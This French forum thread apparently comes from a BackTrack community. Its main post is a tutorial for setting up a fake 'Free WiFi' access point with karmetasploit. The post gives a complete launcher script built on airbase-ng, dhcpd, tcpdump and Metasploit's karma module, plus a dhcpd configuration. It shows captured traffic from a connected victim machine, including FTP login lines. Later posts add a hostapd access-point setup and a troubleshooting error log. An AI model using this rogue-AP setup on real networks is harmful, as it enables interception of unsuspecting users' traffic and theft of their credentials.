Fake AP avec karmetasploit sur BT3

[Nagual]

Forum BACKTRACK-FR / [tuTO] Fake AP avec karmetasploit

Nous allons voir ici comment créer un faux AP afin de récupérer les données transitant par notre pc, une fois que quelqu'un s'y est connecté.

Il faut pour cela qu'aircrack et metasploit soient à jour. On peut tout updater depuis fastrack.

voici ma configuration pour cet exemple : 2 machines distinctes (NB = Notebook), un routeur, un fake AP donc PAS de vm.

+--------+____________+--------+__________+-------------+
| router --+----rj45-----+ NB BT3 +-----------+ AP Alfa 500 +
+--------+ #########+--------+-#######+---+---------+
################################## /|\
###################################*
###############################connection
###################################*
###################################|
#######+--------+##########+-----------------+
#######+ NB XP +-------------+ Wifi Wus54gc +
#######+--------+##########+-----------------+

1) création du script qui va lancer karmetasploit

Code:

bt Desktop # kedit karmetasploit.sh

contenu

Code:

#!/bin/bash

killall -9 dhcpd tcpdump airbase-ng

airmon-ng start wlan0
modprobe tun

airbase-ng -P -C 30 -c 7 -e "Free WiFi" -v wlan0 >/dev/null 2>&1 &
sleep 2
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
sleep 2
echo > /var/state/dhcp/dhcpd.leases
dhcpd -cf /pentest/exploits/framework3/dhcpd.conf at0
sleep 2
ifconfig at0 mtu 1800
tcpdump -ni at0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap >/dev/null 2>&1 &
/pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc

Ne pas oublier de le rendre exécutable

Code:

bt Desktop # chmod +x karmetasploit.sh

Télécharger le ici : karmetasploit.sh

2) création du fichier dhcpd.conf

Code:

bt Desktop # kedit /pentest/exploits/framework3/dhcpd.conf

contenu

Code:

option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}

Télécharger le ici : dhcpd.conf

3) Voila il ne nous reste plus qu'à lancer notre script

Code:

bt Desktop # ./karmetasploit.sh

les modules se loadent et le server démarre



4) on vérifie si notre fake AP est visible



5) Depuis notre poste windows, on lance notre wifi manager



6) et on se connecte sur le free WIFI



7) Regardons si on reçoit quelque chose sur notre server



8) Tout ce qui transite par notre machine est capturé est sauvegardé dans un fichier que nous pourrons exploiter.
Nous allons donc ouvir le fichier "/pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap" avec wireshark.



On constate que c'est bel et bien ce que l'on avait sur notre écran

Code:

¦*¦ HTTP REQUEST 10.0.0.254 > download.windowsupdate.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
¦*¦ HTTP REQUEST 10.0.0.254 > download.windowsupdate.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
¦*¦ HTTP REQUEST 10.0.0.254 > download.windowsupdate.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
¦*¦ DNS 10.0.0.254:49836 XID 42755 (IN::A wpad)
¦*¦ HTTP wpad.dat sent to 10.0.0.254
¦*¦ HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
¦*¦ HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
¦*¦ HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
¦*¦ HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
¦*¦ HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
¦*¦ HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
¦*¦ HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
¦*¦ HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows   cookies=
¦*¦ DNS 10.0.0.254:62629 XID 21450 (IN::A www.symantec.com)
¦*¦ DNS 10.0.0.254:57988 XID 17388 (IN::A liveupdate.symantecliveupdate.com)
¦*¦ HTTP REQUEST 10.0.0.254 > liveupdate.symantecliveupdate.com:80 GET /minitri.flg Unknown   cookies=
¦*¦ HTTP REQUEST 10.0.0.254 > liveupdate.symantecliveupdate.com:80 GET /livetri.zip Unknown   cookies=
¦*¦ DNS 10.0.0.254:51388 XID 59332 (IN::A liveupdate.symantec.com)
¦*¦ HTTP REQUEST 10.0.0.254 > liveupdate.symantec.com:80 GET /minitri.flg Unknown   cookies=
¦*¦ HTTP REQUEST 10.0.0.254 > liveupdate.symantec.com:80 GET /livetri.zip Unknown   cookies=
¦*¦ DNS 10.0.0.254:65278 XID 60765 (IN::A update.symantec.com)
¦*¦ FTP LOGIN 10.0.0.254:1107 cust-r2 / xxxxxxx
¦*¦ FTP LOGIN 10.0.0.254:1108 cust-r2 / xxxxxxx

LINKS: tuto avec explications et vidéos
bricowifi|tuto karmetasploit [evil ap]
brico-wifi: tuto evil ap (rogue ap) karmetasploit (backtrack 3)

[Nagual]

Quote:

Originally Posted by bricowifi

atheros avec hostapd (sous debian ect) (à modifier si vous voulez l'ouvrir car ici c'est en WPA)
/etc/network/interfaces :

Code:

auto ath0
iface ath0 inet static
	address 10.3.1.1
	netmask 255.255.0.0
	wireless-essid votre-essid
	wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf

/etc/wpa_supplicant/wpa_supplicant.conf :

Code:

network={
        ssid="votre-essid"
        #psk="votre-mot-de-passe"
        psk=fe2f5faa7b4f4d47f97ee4e70efa949976f06579ad8d2c1ea3991a7b46ea0a9e
}

/etc/dhcp3/dhcpd.conf :

Code:

ddns-update-style none;
option domain-name "tsgri2007.net";
#option domain-name-servers ns1.example.org, ns2.example.org;

default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wifi
subnet 10.3.0.0 netmask 255.255.0.0 {
	range 10.3.0.2 10.3.255.254;
	option domain-name-servers 10.3.1.1;
	#  option domain-name "internal.example.org";
	option routers 10.3.1.1;
	option broadcast-address 10.3.255.255;
	default-lease-time 600;
	max-lease-time 7200;
}

/etc/hostapd/hostapd.conf :

Code:

interface=ath0
driver=madwifi
logger_syslog=-1
logger_syslog_level=2
logger_stdout=--1
logger_stdout_level=2
debug=0
ctrl_interface_group=0
macaddr_acl=0
#deny_mac_file=/etc/hostapd/hostapd.deny
auth_algs=3
eapol_key_index_workaround=0
eap_server=0
dump_file=/tmp/hostapd.dump
ssid=SMH_WIFI
wpa=3
wpa_psk=fe2f5faa7b4f4d47f97ee4e70efa949976f06579ad8d2c1ea3991a7b46ea0a9e
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP

Le script de démarrage :

Code:

#!/bin/sh

#########################################################################
# Création de la carte ath0 et du point d'accès debian-access-point
echo "Création de la carte ath0 et du point d'accès debian-access-point";

ifconfig ath0 down;
wlanconfig ath0 destroy;
wlanconfig ath0 create wlandev wifi0 wlanmode ap nosbeacon;

echo "Veuillez patienter...";
sleep 1;
echo "Mise en place des options du point d'accès debian-access-point";
iwconfig ath0 key restricted;

echo "Veuillez patienter...";
sleep 2;
echo "Activation de ath0";
ifconfig ath0 10.3.1.1 up;
/usr/sbin/hostapd -B -P /var/run/hostapd.pid -dd -K -t /etc/hostapd/hostapd.conf;

ceci se trouve ici bricowifi|création d'un soft AP sous backtrack avec airbase-ng ou sans

[Hokiko]

Merci beaucoup s3th, justement je pensais m'y mettre ce week-end

Bon boulot

[Hokiko]

Je viens d'essayer, ça fonctionne bien Juste un petit soucis, c'est que l'essid n'est pas visible mais <hidden> dans Wireless Assistant, je vais fouiller un peu mais si quelqu'un à une idée d'où peut venir le problème je suis preneur.

Bonne journée à vous !

[goliate]

moi j'ai des erreurs

Code:

PID     Name
5475    wpa_supplicant
5506    dhclient
Process with PID 5475 (wpa_supplicant) is running on interface wlan0
Process with PID 5506 (dhclient) is running on interface wlan0


Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
                                (monitor mode enabled on mon2)
mon0            Atheros         ath5k - [phy0]
mon1            Atheros         ath5k - [phy0]

at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
./karmetasploit.sh: line 12: /var/state/dhcp/dhcpd.leases: No such file or directory
./karmetasploit.sh: line 13: dhcpd: command not found
SIOCSIFMTU: No such device

je suis sur la pré-final si sa peut aider ?